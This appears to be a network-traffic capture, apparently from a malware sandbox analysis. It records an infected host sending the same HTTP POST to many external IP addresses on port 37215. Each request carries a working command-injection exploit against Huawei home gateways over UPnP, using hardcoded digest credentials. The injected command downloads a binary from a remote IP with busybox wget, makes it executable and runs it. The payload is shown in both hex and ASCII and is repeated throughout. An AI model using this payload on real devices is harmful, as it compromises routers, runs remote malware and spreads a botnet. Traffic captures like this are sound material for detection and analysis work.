2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2123192.168.2.154632441.17.17.12837215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670068979 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2124192.168.2.155290241.8.163.16937215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670085907 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2125192.168.2.154547441.214.168.24537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670097113 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2126192.168.2.153466641.85.27.22737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670109034 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2127192.168.2.153910441.237.49.1537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670115948 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2128192.168.2.153329841.217.252.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670125961 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2129192.168.2.155329041.14.228.13137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670171976 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2130192.168.2.156060041.16.240.2737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670192957 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2131192.168.2.153849441.120.25.21637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670203924 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2132192.168.2.153348641.220.54.9337215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670205116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            2133192.168.2.154932841.118.94.12037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:16.670205116 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
